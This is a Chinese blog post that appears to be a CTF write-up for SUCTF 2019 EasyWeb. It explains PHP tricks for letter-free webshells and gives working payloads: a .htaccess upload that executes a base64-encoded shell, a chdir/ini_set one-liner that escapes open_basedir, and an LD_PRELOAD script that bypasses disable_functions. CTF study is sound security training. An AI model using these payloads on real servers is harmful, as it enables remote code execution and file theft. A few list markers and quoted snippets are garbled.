php反向代理ctf,刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)

最新推荐文章于 2023-07-01 21:30:47 发布
最新推荐文章于 2023-07-01 21:30:47 发布
阅读量292 收藏
点赞数
文章标签: php反向代理ctf

[TOC]

刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)

一、涉及知识点

1、无数字字母shell

这个方面充满了奇技淫巧,看的我一愣一愣,先说利用的php特性:

(1)代码中没有引号的字符都自动作为字符串

Php的经典特性“Use of undefined constant”,会将代码中没有引号的字符都自动作为字符串,7.2开始提出要被废弃,不过目前还存在着。

我猜这也是为什么传马的时候$_GET['cmd']和$_GET[cmd]都可以

(2)Ascii码大于 0x7F 的字符都会被当作字符串

(3)php 在获取 HTTP GET 参数的时候默认是获得到了字符串类型

$str{4}在字符串的变量的后面跟上{}大括号或者中括号[],里面填写了数字,这里是把字符串变量当成数组处理

${_GET}{cmd}

57)字符串可以用!操作符来进行布尔类型的转换

var_dump(@a); //string(1) "a"

var_dump(!@a); //bool(false)

var_dump(!!@a); //bool(true)

(6)PHP的弱类型特性

因为要获取'和'{2},就必须有数字2。而PHP由于弱类型这个特性,true的值为1,故true+true==2,也就是('>'>''>'

(7)a-zA-Z使用自增变成下一个字母

'a'++ => 'b','b'++ => 'c'

2、利用.htaccess上传文件

当<?被过滤时 ,用伪协议绕过,上传时上传base64编码过的文件

AddType application/x-httpd-php .wuwu

php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"

3、绕过open_basedir/disable_function的几种方法

(1)chdir绕过

chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));

(2)链接文件绕过

(3)disable_function绕过--利用LD_PRELOAD

条件:PHP 支持putenv()和下面用到的函数

贴上关键脚本

echo "

example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so

";

$cmd = $_GET["cmd"];

$out_path = $_GET["outpath"];

$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";

echo "

cmdline: " . $evil_cmdline . "

";

putenv("EVIL_CMDLINE=" . $evil_cmdline);

$so_path = $_GET["sopath"];

putenv("LD_PRELOAD=" . $so_path);

mail("", "", "", "");

//error_log("err",1,"","");

//$img = Imagick("1.mp4");//如果有ImageMagick这个扩展(文件必须存在)

//imap_mail("","","");//需要安装imap拓展

//mb_send_mail("","","");

echo "

output:
" . nl2br(file_get_contents($out_path)) . "

";

unlink($out_path);

?>

(4)fpm 绕过

还没解出来,有空再更

weixin_39946657
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ISITDTU 2019]EasyPHP
wjd19980925的博客
06-08 807
[ISITDTU 2019]EasyPHP
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
i-SOON_CTF_2019 2019第二届安洵杯部分过渡环境/源码 收集分类为大型/大型CTF比赛赛题,提供容器化专属翻译环境。 如有争议,或转型问题请电联
EasyPHP - 略有极客感的 WEB 环境工具
沉冰浮水的CSDN主页
04-04 262
title: EasyPHP - 略有极客感的 WEB 环境工具 tags: PHP Web_开发 categories: 电脑网络 id: 420 alias: 20210224528 软件名称 EasyPHP 应用平台 Windows 推荐类型 【用户投递】 一句简介 PHP, Apache, MySQL, Nginx, PhpMyAdmin, Xdebug, PostgreSQL, MongoDB, Python, Ruby… for Windows 应用简介 可选 PHP 8.0; 界面.
php反向代理ctf,ctf题目writeup(7)
weixin_30930625的博客
03-11 295
2019.2.3继续刷bugku的题,题目地址:https://ctf.bugku.com/challenges1. ook和brainfuck都到这个网站:https://www.splitbrain.org/services/ook flag{ok-ctf-1234-admin}2. +++++ +++++ [->++ +++++ +++++.+ +++++ .-- -- -.+++ +...
CTF-easy_php
m0_62593857的博客
02-01 548
ctf-easy_php
CTF 云演LANCTF_2019_easyphp
qq_42385363的博客
07-01 181
使用true来绕过==,即true弱等于任何非0数值,我们就可以使用来绕过,但是这里不能传字符串,是我们需要将true隔开,字符串不能实现,所以这里需要传入数组来实现,即传入[true,true,true,true,true,true,true] ,所以现在我们知道怎么做了,上手,我们进行修改。这里需要注意,我们后面需要加上php,是因为源码里面进行了拼接 ,前面的$file是我们md5加密后的整个文件名(b.php),后面是$name1,也就是文件类型,即后缀,所以要加上php
我的ctf刷题wp笔记
最新发布
03-25
我的ctf刷题wp笔记
CTF-Heaven:TF CTF天堂
05-06
欢迎来到CTF的世界 :skull_and_crossbones:‍:skull_and_crossbones: | 2021年3月12日| 鸣谢:( 和( 。 这是每个类别的一些基础知识的简介。 它旨在帮助初学者和老同志,享受骑行和“ HackThePlanet”。 这些...
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
ctf-tools:CTF工具集合
02-04
ctf-tools:CTF工具集合
攻防世界ctf web easyphp题解wp
qq_41169485的博客
09-28 3697
第二步,用php代码编写MD5碰撞脚本得到b=53724。第五步,绕过array_search函数。第一步,用科学计数法绕过 a=1e9。第三步,绕过is_numeric函数。第四步,绕过is_array函数。一定要对传值url编码。
ctf不允许上传该类型php,d3ctf easyweb题解
weixin_42474164的博客
04-01 461
前言这道题思路其实就是,如果在php中遇到了模版注入,但是限制了不允许执行php代码的时候,怎么通过模版注入达到RCE的效果考点预期:二次注入模版注入phar反序列化CI RCE POP链挖掘非预期:二次注入模版注入SSTI沙箱逃逸二次注入image.png可以看到,在get_view的时候,通过session中的userid从数据库中取出了用户的username,之后对username进行了两次...
[GYCTF2020]Easyphp
shinygod的博客
04-06 1295
知识点:反序列化字符串逃逸,pop链构造 反序列化字符串逃逸 此知识点可以结合题目来看。 https://blog.csdn.net/shinygod/article/details/123724105 分析 /www.zip拿源码 在update.php中可以拿到flag,条件$_SESSION['login']===1在lib.php中 <?php require_once('lib.php'); if ($_SESSION['login']!=1){ echo "你还没有登陆呢!"; } $
WHUCTF easyphp代码审计
weixin_44255856的博客
06-09 1761
JSON 数据结构介绍: 按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett 但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如: { "firstName": "Brett", "lastName":...
[xctf] 江苏工匠杯easyphpweb系列】
shutTD的博客
10-07 2007
这里绕来绕去大部分还是弱相等问题,出现的知识点的要求就是自己编写哈希碰撞脚本的能力,intval的绕过,array_search的绕过还是值得记下来的。
ctf题库 web php越权,刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
weixin_32050033的博客
03-24 601
目录刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)一、涉及知识点1、无数字字母shell2、利用.htaccess上传文件3、绕过open_basedir/disable_function的几种方法刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)题目复现链接:https://buuoj.cn/challenges参考链接:SUCTF-20192019 SUCT...
buuCTF [ISITDTU 2019]EasyPHP 1
weixin_45642610的博客
08-08 751
buuCTF [ISITDTU 2019]EasyPHP 1 直接代码审计。 第一个if,过preg_match。一般有三种方法:取反绕过,异或绕过,转义绕过。 这里用取反绕过。 第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13。如aaa((bc不重复字符为a(bc长度为4。 尝试phpinfo: ?_=(%ff%ff%ff%ff%ff%ff%ff^%8f%97%8f%96%91%99%90)(); 可以去看看disable_function禁了哪些函数。 附上异或php脚本: &lt
BUUCTF:[ISITDTU 2019]EasyPHP
末初的CSDN博客
04-27 4299
题目地址:BUUCTF:[ISITDTU 2019]EasyPHP Refer: https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/ 思路很简单,绕过这两个if即可任意代码执行 先看一下第一个正则匹配 看不懂的推荐使用这个网站:https://regex101.com/ if ( preg_match('/[\x00- 0-9\'"...
[D3CTF 2019]EasyWeb
07-28
综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值